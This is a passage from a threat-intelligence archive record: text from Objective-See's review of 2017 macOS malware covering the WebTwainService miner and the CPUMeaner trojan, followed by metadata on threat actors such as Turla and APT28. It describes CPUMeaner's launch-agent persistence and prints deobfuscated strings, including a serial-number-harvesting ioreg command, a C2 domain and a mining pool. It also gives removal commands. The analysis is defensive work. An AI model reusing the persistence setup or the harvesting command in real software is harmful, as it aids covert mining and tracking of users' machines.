unload /Library/LaunchDaemons/com.dynamsoft.WebTwainService.plist\r\n $ rm /Library/LaunchDaemons/com.dynamsoft.WebTwainService.plist\r\nThen delete all installed components, which are stored in various 'hidden' directory in under/var/ such as:\r\n/Library/LaunchDaemons/com.dynamsoft.WebTwainService.plist\r\n/var/.log/\r\n/var/.trash/\r\n/var/.old\r\nFinally if the miner binary ('com.apple.SafariHelper') is running, terminate it!\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 63 of 67\n\nCPUMeaner\r\nfound: November, SentinelOne\r\ninfection: trojanized pirated applications\r\nfeatures: cryptocurrency miner\r\ndisinfection: remove launch agent and miner\r\nwriteups: \"OSX.CPUMeaner: New Cryptocurrency Mining Trojan Targets Macos\" (SentinelOne)\r\nOSX/CPUMeaner is a cryptocurrency miner that targets macOS users. Arriving in pirated applications, it mines Monero.\r\nArnaud Abbati (@noarfromspace) who uncovered CPUMeaner, provides an in-depth technical writeup on the malware.\r\n infection:\r\nArnaud notes that the infection vector for CPUMeaner can come from a variety of sources.\r\n\"Individuals using pirated software could end up with malware from a variety of sources including a simple Google search\r\nand a YouTube video with a malicious link in its description. In the middle of technical support scams, fake Flash players,\r\nand recommended virus scans, the victim could end up with a malicious package.\"\r\nAt this time, Apple has revoked the certificate used to sign (at least some instances of) the malware:\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 64 of 67\n\npersistence:\r\nWhen the user runs the malicious installer (.pkg), it will execute the package's 'post install' script. Using the neat 'Suspicious\r\nPackage' application, we can statically examine this script:\r\nIn short, it persists CPUMeaner as a launch agent via the /Library/LaunchAgents/com.osxext.cpucooler.plist file. As the\r\n'RunAtLoad' key is set to true, whenever the system is rebooted and the user logs in, whatever is specified in Program key\r\nwill be automatically executed by the OS. Examining this key, we can see it's set to /Library/Application\r\nSupport/CpuCooler/cpucooler:\r\nINSTALL_LOCATION=\"/Library/Application Support/CpuCooler/cpucooler\"\r\n...\r\n\u003ckey\u003eProgram\u003c/key\u003e\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 65 of 67\n\n\u003cstring\u003e'$INSTALL_LOCATION'\u003c/string\u003e\r\n features:\r\nThe main goal of CPUMeaner is to mine cryptocurrency. Arnaud determined that cpucooler is a \"custom builds of XMRig\r\nversion 2.3.1, an open-source Monero CPU miner\"\r\nThough the author added some extra functionality to obfuscate strings, Arnaud wrote a deobfuscation python script:\r\n $ decrypt_strings.py cpucooler\r\n \r\n ioreg -rd1 -w0 -c AppleAHCIDiskDriver\r\n | awk '/Serial Number/{gsub(\"\\\"\", \"\", $4);print $4}'\r\n jumpcash.xyz\r\n \r\n stratum+tcp://xmr.pool.minergate.com:45560\r\n jeffguyen@mail.com\r\nThese deobfuscated strings (plus binary analysis) confirm that binary, cpucooler is a cryptominer, which will \"mine on\r\nMinerGate XMR pool for jeffguyen@mail.com.\"\r\nBesides pegging your CPU to mine cryptocurrency, CPUMeaner also pings a remote server, jumpcash.xyz with some\r\ninstallation data. This may include infected system's serial number - as grabbed by the output of the (deobfuscated) ioreg\r\ncommand:\r\n ioreg -rd1 -w0 -c AppleAHCIDiskDriver\r\n | awk '/Serial Number/{gsub(\"\\\"\", \"\", $4);print\r\n disinfection:\r\nTo remove CPUMeaner, first unload and remove its persistent launch agent plist:\r\n $ launchctl unload /Library/LaunchAgents/com.osxext.cpucooler.plist\r\n $ rm /Library/LaunchAgents/com.osxext.cpucooler.plist\r\nThen delete the miner binary, /Library/Application Support/CpuCooler/. Finally if the miner binary (cpucooler) is running,\r\nterminate it!\r\n Note:\r\n There are other variants of CPUMeaner such as 'XMemApp' that may install the\r\n cryptocurrency miner to other locations.\r\n See Arnaud's excellent writeup for details on these variants.\r\nThanks\r\nI briefly want to thank the following fellow malware analysts/macOS reversers! Their research and assistance has been\r\nparamount to my own research, conference talks, and the advancement of my macOS knowledge:\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 66 of 67\n\n@0xAmit\r\n@Morpheus______\r\n@noarfromspace\r\n@osxreverser\r\n@theJoshMeister\r\n@thomasareed\r\nlove these blog posts \u0026 tools? you can support them via patreon! Mahalo :)\r\nSource: https://objective-see.com/blog/blog_0x25.html\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 67 of 67", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://objective-see.com/blog/blog_0x25.html" ], "report_names": [ "blog_0x25.html" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0", "created_at": "2022-10-25T15:50:23.710403Z", "updated_at": "2026-04-10T02:00:05.281246Z", "deleted_at": null, "main_name": "Silence", "aliases": [ "Whisper Spider" ], "source_name": "MITRE:Silence", "tools": [ "Winexe", "SDelete" ], "source_id": "MITRE", "reports": null }, { "id": "029625d2-9734-44f9-9e10-b894b4f57f08", "created_at": "2023-01-06T13:46:38.364105Z", "updated_at": "2026-04-10T02:00:02.944092Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "iKittens", "Group 83", "NewsBeef", "G0058", "CharmingCypress", "Mint Sandstorm", "Parastoo" ], "source_name": "MISPGALAXY:Charming Kitten", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "75108fc1-7f6a-450e-b024-10284f3f62bb", "created_at": "2024-11-01T02:00:52.756877Z", "updated_at": "2026-04-10T02:00:05.273746Z", "deleted_at": null, "main_name": "Play", "aliases": null, "source_name": "MITRE:Play", "tools": [ "Nltest", "AdFind", "PsExec", "Wevtutil", "Cobalt Strike", "Playcrypt", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7", "created_at": "2025-03-29T02:05:20.764715Z", "updated_at": "2026-04-10T02:00:03.851829Z", "deleted_at": null, "main_name": "GOLD WYMAN", "aliases": [ "Silence " ], "source_name": "Secureworks:GOLD WYMAN", "tools": [ "Silence" ], "source_id": "Secureworks", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "88e53203-891a-46f8-9ced-81d874a271c4", "created_at": "2022-10-25T16:07:24.191982Z", "updated_at": "2026-04-10T02:00:04.895327Z", "deleted_at": null, "main_name": "Silence", "aliases": [ "ATK 86", "Contract Crew", "G0091", "TAG-CR8", "TEMP.TruthTeller", "Whisper Spider" ], "source_name": "ETDA:Silence", "tools": [ "EDA", "EmpireDNSAgent", "Farse", "Ivoke", "Kikothac", "LOLBAS", "LOLBins", "Living off the Land", "Meterpreter", "ProxyBot", "ReconModule", "Silence.Downloader", "TiniMet", "TinyMet", "TrueBot", "xfs-disp.exe" ], "source_id": "ETDA", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434184, "ts_updated_at": 1775792270, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/62e8e695a08a7e3c1db4e245db414809b38dd968.pdf", "text": "https://archive.orkl.eu/62e8e695a08a7e3c1db4e245db414809b38dd968.txt", "img": "https://archive.orkl.eu/62e8e695a08a7e3c1db4e245db414809b38dd968.jpg" } }